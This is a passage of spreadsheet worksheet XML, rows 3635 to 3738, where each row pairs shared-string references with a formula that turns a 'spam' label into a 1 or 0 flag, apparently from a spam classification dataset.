    <row r="3635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3635" t="s">
        <v>8722</v>
      </c>
      <c r="B3635" t="s">
        <v>5294</v>
      </c>
      <c r="C3635" s="1">
        <f>IF(B3635="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3636" t="s">
        <v>8723</v>
      </c>
      <c r="B3636" t="s">
        <v>5294</v>
      </c>
      <c r="C3636" s="1">
        <f>IF(B3636="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3637" t="s">
        <v>8724</v>
      </c>
      <c r="B3637" t="s">
        <v>5294</v>
      </c>
      <c r="C3637" s="1">
        <f>IF(B3637="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3638" t="s">
        <v>8725</v>
      </c>
      <c r="B3638" t="s">
        <v>5294</v>
      </c>
      <c r="C3638" s="1">
        <f>IF(B3638="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3639" t="s">
        <v>8726</v>
      </c>
      <c r="B3639" t="s">
        <v>5297</v>
      </c>
      <c r="C3639" s="1">
        <f>IF(B3639="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3640" t="s">
        <v>8727</v>
      </c>
      <c r="B3640" t="s">
        <v>5294</v>
      </c>
      <c r="C3640" s="1">
        <f>IF(B3640="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3641" t="s">
        <v>8728</v>
      </c>
      <c r="B3641" t="s">
        <v>5294</v>
      </c>
      <c r="C3641" s="1">
        <f>IF(B3641="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3642" t="s">
        <v>8729</v>
      </c>
      <c r="B3642" t="s">
        <v>5297</v>
      </c>
      <c r="C3642" s="1">
        <f>IF(B3642="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3643" t="s">
        <v>8730</v>
      </c>
      <c r="B3643" t="s">
        <v>5294</v>
      </c>
      <c r="C3643" s="1">
        <f>IF(B3643="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3644" t="s">
        <v>8731</v>
      </c>
      <c r="B3644" t="s">
        <v>5294</v>
      </c>
      <c r="C3644" s="1">
        <f>IF(B3644="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3645" t="s">
        <v>8732</v>
      </c>
      <c r="B3645" t="s">
        <v>5294</v>
      </c>
      <c r="C3645" s="1">
        <f>IF(B3645="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3646" t="s">
        <v>8733</v>
      </c>
      <c r="B3646" t="s">
        <v>5297</v>
      </c>
      <c r="C3646" s="1">
        <f>IF(B3646="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3647" t="s">
        <v>8734</v>
      </c>
      <c r="B3647" t="s">
        <v>5294</v>
      </c>
      <c r="C3647" s="1">
        <f>IF(B3647="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3648" t="s">
        <v>8735</v>
      </c>
      <c r="B3648" t="s">
        <v>5294</v>
      </c>
      <c r="C3648" s="1">
        <f>IF(B3648="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3649" t="s">
        <v>6968</v>
      </c>
      <c r="B3649" t="s">
        <v>5294</v>
      </c>
      <c r="C3649" s="1">
        <f>IF(B3649="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3650" t="s">
        <v>8736</v>
      </c>
      <c r="B3650" t="s">
        <v>5294</v>
      </c>
      <c r="C3650" s="1">
        <f>IF(B3650="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3651" t="s">
        <v>8737</v>
      </c>
      <c r="B3651" t="s">
        <v>5294</v>
      </c>
      <c r="C3651" s="1">
        <f>IF(B3651="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3652" t="s">
        <v>8738</v>
      </c>
      <c r="B3652" t="s">
        <v>5294</v>
      </c>
      <c r="C3652" s="1">
        <f>IF(B3652="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3653" t="s">
        <v>8739</v>
      </c>
      <c r="B3653" t="s">
        <v>5294</v>
      </c>
      <c r="C3653" s="1">
        <f>IF(B3653="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3654" t="s">
        <v>8740</v>
      </c>
      <c r="B3654" t="s">
        <v>5294</v>
      </c>
      <c r="C3654" s="1">
        <f>IF(B3654="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3655" t="s">
        <v>8741</v>
      </c>
      <c r="B3655" t="s">
        <v>5294</v>
      </c>
      <c r="C3655" s="1">
        <f>IF(B3655="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3656" t="s">
        <v>8742</v>
      </c>
      <c r="B3656" t="s">
        <v>5294</v>
      </c>
      <c r="C3656" s="1">
        <f>IF(B3656="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3657" t="s">
        <v>8743</v>
      </c>
      <c r="B3657" t="s">
        <v>5294</v>
      </c>
      <c r="C3657" s="1">
        <f>IF(B3657="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3658" t="s">
        <v>8744</v>
      </c>
      <c r="B3658" t="s">
        <v>5294</v>
      </c>
      <c r="C3658" s="1">
        <f>IF(B3658="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3659" t="s">
        <v>8745</v>
      </c>
      <c r="B3659" t="s">
        <v>5294</v>
      </c>
      <c r="C3659" s="1">
        <f>IF(B3659="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3660" t="s">
        <v>8746</v>
      </c>
      <c r="B3660" t="s">
        <v>5294</v>
      </c>
      <c r="C3660" s="1">
        <f>IF(B3660="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3661" t="s">
        <v>8747</v>
      </c>
      <c r="B3661" t="s">
        <v>5294</v>
      </c>
      <c r="C3661" s="1">
        <f>IF(B3661="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3662" t="s">
        <v>8748</v>
      </c>
      <c r="B3662" t="s">
        <v>5294</v>
      </c>
      <c r="C3662" s="1">
        <f>IF(B3662="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3663" t="s">
        <v>8749</v>
      </c>
      <c r="B3663" t="s">
        <v>5294</v>
      </c>
      <c r="C3663" s="1">
        <f>IF(B3663="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3664" t="s">
        <v>8750</v>
      </c>
      <c r="B3664" t="s">
        <v>5294</v>
      </c>
      <c r="C3664" s="1">
        <f>IF(B3664="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3665" t="s">
        <v>8751</v>
      </c>
      <c r="B3665" t="s">
        <v>5294</v>
      </c>
      <c r="C3665" s="1">
        <f>IF(B3665="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3666" t="s">
        <v>8752</v>
      </c>
      <c r="B3666" t="s">
        <v>5294</v>
      </c>
      <c r="C3666" s="1">
        <f>IF(B3666="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3667" t="s">
        <v>8753</v>
      </c>
      <c r="B3667" t="s">
        <v>5294</v>
      </c>
      <c r="C3667" s="1">
        <f>IF(B3667="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3668" t="s">
        <v>8754</v>
      </c>
      <c r="B3668" t="s">
        <v>5294</v>
      </c>
      <c r="C3668" s="1">
        <f>IF(B3668="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3669" t="s">
        <v>8755</v>
      </c>
      <c r="B3669" t="s">
        <v>5294</v>
      </c>
      <c r="C3669" s="1">
        <f>IF(B3669="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3670" t="s">
        <v>8756</v>
      </c>
      <c r="B3670" t="s">
        <v>5294</v>
      </c>
      <c r="C3670" s="1">
        <f>IF(B3670="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3671" t="s">
        <v>8757</v>
      </c>
      <c r="B3671" t="s">
        <v>5294</v>
      </c>
      <c r="C3671" s="1">
        <f>IF(B3671="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3672" t="s">
        <v>8758</v>
      </c>
      <c r="B3672" t="s">
        <v>5294</v>
      </c>
      <c r="C3672" s="1">
        <f>IF(B3672="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3673" t="s">
        <v>8759</v>
      </c>
      <c r="B3673" t="s">
        <v>5294</v>
      </c>
      <c r="C3673" s="1">
        <f>IF(B3673="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3674" t="s">
        <v>8760</v>
      </c>
      <c r="B3674" t="s">
        <v>5294</v>
      </c>
      <c r="C3674" s="1">
        <f>IF(B3674="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3675" t="s">
        <v>6782</v>
      </c>
      <c r="B3675" t="s">
        <v>5297</v>
      </c>
      <c r="C3675" s="1">
        <f>IF(B3675="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3676" t="s">
        <v>8761</v>
      </c>
      <c r="B3676" t="s">
        <v>5294</v>
      </c>
      <c r="C3676" s="1">
        <f>IF(B3676="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3677" t="s">
        <v>8762</v>
      </c>
      <c r="B3677" t="s">
        <v>5294</v>
      </c>
      <c r="C3677" s="1">
        <f>IF(B3677="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3678" t="s">
        <v>8763</v>
      </c>
      <c r="B3678" t="s">
        <v>5294</v>
      </c>
      <c r="C3678" s="1">
        <f>IF(B3678="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3679" t="s">
        <v>8764</v>
      </c>
      <c r="B3679" t="s">
        <v>5297</v>
      </c>
      <c r="C3679" s="1">
        <f>IF(B3679="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3680" t="s">
        <v>6705</v>
      </c>
      <c r="B3680" t="s">
        <v>5294</v>
      </c>
      <c r="C3680" s="1">
        <f>IF(B3680="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3681" t="s">
        <v>5590</v>
      </c>
      <c r="B3681" t="s">
        <v>5294</v>
      </c>
      <c r="C3681" s="1">
        <f>IF(B3681="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3682" t="s">
        <v>8765</v>
      </c>
      <c r="B3682" t="s">
        <v>5294</v>
      </c>
      <c r="C3682" s="1">
        <f>IF(B3682="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3683" t="s">
        <v>8766</v>
      </c>
      <c r="B3683" t="s">
        <v>5294</v>
      </c>
      <c r="C3683" s="1">
        <f>IF(B3683="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3684" t="s">
        <v>8767</v>
      </c>
      <c r="B3684" t="s">
        <v>5294</v>
      </c>
      <c r="C3684" s="1">
        <f>IF(B3684="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3685" t="s">
        <v>8768</v>
      </c>
      <c r="B3685" t="s">
        <v>5294</v>
      </c>
      <c r="C3685" s="1">
        <f>IF(B3685="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3686" t="s">
        <v>8769</v>
      </c>
      <c r="B3686" t="s">
        <v>5294</v>
      </c>
      <c r="C3686" s="1">
        <f>IF(B3686="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3687" t="s">
        <v>8770</v>
      </c>
      <c r="B3687" t="s">
        <v>5294</v>
      </c>
      <c r="C3687" s="1">
        <f>IF(B3687="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3688" t="s">
        <v>8771</v>
      </c>
      <c r="B3688" t="s">
        <v>5294</v>
      </c>
      <c r="C3688" s="1">
        <f>IF(B3688="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3689" t="s">
        <v>8772</v>
      </c>
      <c r="B3689" t="s">
        <v>5294</v>
      </c>
      <c r="C3689" s="1">
        <f>IF(B3689="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3690" t="s">
        <v>8773</v>
      </c>
      <c r="B3690" t="s">
        <v>5294</v>
      </c>
      <c r="C3690" s="1">
        <f>IF(B3690="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3691" t="s">
        <v>8774</v>
      </c>
      <c r="B3691" t="s">
        <v>5294</v>
      </c>
      <c r="C3691" s="1">
        <f>IF(B3691="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3692" t="s">
        <v>8775</v>
      </c>
      <c r="B3692" t="s">
        <v>5294</v>
      </c>
      <c r="C3692" s="1">
        <f>IF(B3692="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3693" t="s">
        <v>7900</v>
      </c>
      <c r="B3693" t="s">
        <v>5294</v>
      </c>
      <c r="C3693" s="1">
        <f>IF(B3693="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3694" t="s">
        <v>8776</v>
      </c>
      <c r="B3694" t="s">
        <v>5294</v>
      </c>
      <c r="C3694" s="1">
        <f>IF(B3694="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3695" t="s">
        <v>8777</v>
      </c>
      <c r="B3695" t="s">
        <v>5294</v>
      </c>
      <c r="C3695" s="1">
        <f>IF(B3695="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3696" t="s">
        <v>8778</v>
      </c>
      <c r="B3696" t="s">
        <v>5294</v>
      </c>
      <c r="C3696" s="1">
        <f>IF(B3696="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3697" t="s">
        <v>8779</v>
      </c>
      <c r="B3697" t="s">
        <v>5294</v>
      </c>
      <c r="C3697" s="1">
        <f>IF(B3697="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3698" t="s">
        <v>8780</v>
      </c>
      <c r="B3698" t="s">
        <v>5297</v>
      </c>
      <c r="C3698" s="1">
        <f>IF(B3698="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3699" t="s">
        <v>8781</v>
      </c>
      <c r="B3699" t="s">
        <v>5294</v>
      </c>
      <c r="C3699" s="1">
        <f>IF(B3699="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3700" t="s">
        <v>8782</v>
      </c>
      <c r="B3700" t="s">
        <v>5294</v>
      </c>
      <c r="C3700" s="1">
        <f>IF(B3700="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3701" t="s">
        <v>8783</v>
      </c>
      <c r="B3701" t="s">
        <v>5294</v>
      </c>
      <c r="C3701" s="1">
        <f>IF(B3701="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3702" t="s">
        <v>8784</v>
      </c>
      <c r="B3702" t="s">
        <v>5294</v>
      </c>
      <c r="C3702" s="1">
        <f>IF(B3702="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3703" t="s">
        <v>8785</v>
      </c>
      <c r="B3703" t="s">
        <v>5294</v>
      </c>
      <c r="C3703" s="1">
        <f>IF(B3703="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3704" t="s">
        <v>8786</v>
      </c>
      <c r="B3704" t="s">
        <v>5294</v>
      </c>
      <c r="C3704" s="1">
        <f>IF(B3704="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3705" t="s">
        <v>8787</v>
      </c>
      <c r="B3705" t="s">
        <v>5294</v>
      </c>
      <c r="C3705" s="1">
        <f>IF(B3705="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3706" t="s">
        <v>8788</v>
      </c>
      <c r="B3706" t="s">
        <v>5294</v>
      </c>
      <c r="C3706" s="1">
        <f>IF(B3706="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3707" t="s">
        <v>8789</v>
      </c>
      <c r="B3707" t="s">
        <v>5294</v>
      </c>
      <c r="C3707" s="1">
        <f>IF(B3707="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3708" t="s">
        <v>8790</v>
      </c>
      <c r="B3708" t="s">
        <v>5294</v>
      </c>
      <c r="C3708" s="1">
        <f>IF(B3708="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3709" t="s">
        <v>6930</v>
      </c>
      <c r="B3709" t="s">
        <v>5297</v>
      </c>
      <c r="C3709" s="1">
        <f>IF(B3709="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3710" t="s">
        <v>6393</v>
      </c>
      <c r="B3710" t="s">
        <v>5294</v>
      </c>
      <c r="C3710" s="1">
        <f>IF(B3710="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3711" t="s">
        <v>8791</v>
      </c>
      <c r="B3711" t="s">
        <v>5294</v>
      </c>
      <c r="C3711" s="1">
        <f>IF(B3711="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3712" t="s">
        <v>8792</v>
      </c>
      <c r="B3712" t="s">
        <v>5294</v>
      </c>
      <c r="C3712" s="1">
        <f>IF(B3712="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3713" t="s">
        <v>8793</v>
      </c>
      <c r="B3713" t="s">
        <v>5294</v>
      </c>
      <c r="C3713" s="1">
        <f>IF(B3713="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3714" t="s">
        <v>8794</v>
      </c>
      <c r="B3714" t="s">
        <v>5294</v>
      </c>
      <c r="C3714" s="1">
        <f>IF(B3714="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3715" t="s">
        <v>8795</v>
      </c>
      <c r="B3715" t="s">
        <v>5294</v>
      </c>
      <c r="C3715" s="1">
        <f>IF(B3715="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3716" t="s">
        <v>8796</v>
      </c>
      <c r="B3716" t="s">
        <v>5294</v>
      </c>
      <c r="C3716" s="1">
        <f>IF(B3716="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3717" t="s">
        <v>8797</v>
      </c>
      <c r="B3717" t="s">
        <v>5294</v>
      </c>
      <c r="C3717" s="1">
        <f>IF(B3717="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3718" t="s">
        <v>8798</v>
      </c>
      <c r="B3718" t="s">
        <v>5294</v>
      </c>
      <c r="C3718" s="1">
        <f>IF(B3718="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3719" t="s">
        <v>8799</v>
      </c>
      <c r="B3719" t="s">
        <v>5294</v>
      </c>
      <c r="C3719" s="1">
        <f>IF(B3719="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3720" t="s">
        <v>8800</v>
      </c>
      <c r="B3720" t="s">
        <v>5297</v>
      </c>
      <c r="C3720" s="1">
        <f>IF(B3720="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3721" t="s">
        <v>8801</v>
      </c>
      <c r="B3721" t="s">
        <v>5294</v>
      </c>
      <c r="C3721" s="1">
        <f>IF(B3721="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3722" t="s">
        <v>8802</v>
      </c>
      <c r="B3722" t="s">
        <v>5294</v>
      </c>
      <c r="C3722" s="1">
        <f>IF(B3722="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3723" t="s">
        <v>8803</v>
      </c>
      <c r="B3723" t="s">
        <v>5294</v>
      </c>
      <c r="C3723" s="1">
        <f>IF(B3723="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3724" t="s">
        <v>8804</v>
      </c>
      <c r="B3724" t="s">
        <v>5294</v>
      </c>
      <c r="C3724" s="1">
        <f>IF(B3724="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3725" t="s">
        <v>8805</v>
      </c>
      <c r="B3725" t="s">
        <v>5297</v>
      </c>
      <c r="C3725" s="1">
        <f>IF(B3725="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3726" t="s">
        <v>8806</v>
      </c>
      <c r="B3726" t="s">
        <v>5294</v>
      </c>
      <c r="C3726" s="1">
        <f>IF(B3726="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3727" t="s">
        <v>8807</v>
      </c>
      <c r="B3727" t="s">
        <v>5294</v>
      </c>
      <c r="C3727" s="1">
        <f>IF(B3727="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3728" t="s">
        <v>8808</v>
      </c>
      <c r="B3728" t="s">
        <v>5294</v>
      </c>
      <c r="C3728" s="1">
        <f>IF(B3728="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3729" t="s">
        <v>8809</v>
      </c>
      <c r="B3729" t="s">
        <v>5294</v>
      </c>
      <c r="C3729" s="1">
        <f>IF(B3729="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3730" t="s">
        <v>8631</v>
      </c>
      <c r="B3730" t="s">
        <v>5294</v>
      </c>
      <c r="C3730" s="1">
        <f>IF(B3730="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3731" t="s">
        <v>8810</v>
      </c>
      <c r="B3731" t="s">
        <v>5294</v>
      </c>
      <c r="C3731" s="1">
        <f>IF(B3731="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3732" t="s">
        <v>8811</v>
      </c>
      <c r="B3732" t="s">
        <v>5294</v>
      </c>
      <c r="C3732" s="1">
        <f>IF(B3732="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3733" t="s">
        <v>5489</v>
      </c>
      <c r="B3733" t="s">
        <v>5294</v>
      </c>
      <c r="C3733" s="1">
        <f>IF(B3733="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3734" t="s">
        <v>8812</v>
      </c>
      <c r="B3734" t="s">
        <v>5294</v>
      </c>
      <c r="C3734" s="1">
        <f>IF(B3734="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3735" t="s">
        <v>8813</v>
      </c>
      <c r="B3735" t="s">
        <v>5294</v>
      </c>
      <c r="C3735" s="1">
        <f>IF(B3735="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3736" t="s">
        <v>8814</v>
      </c>
      <c r="B3736" t="s">
        <v>5294</v>
      </c>
      <c r="C3736" s="1">
        <f>IF(B3736="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3737" t="s">
        <v>8815</v>
      </c>
      <c r="B3737" t="s">
        <v>5294</v>
      </c>
      <c r="C3737" s="1">
        <f>IF(B3737="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3738" t="s">
        <v>8816</v>
      </c>
      <c r="B3738" t="s">
        <v>5294</v>
      </c>
      <c r="C3738" s="1">
        <f>IF(B3738="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
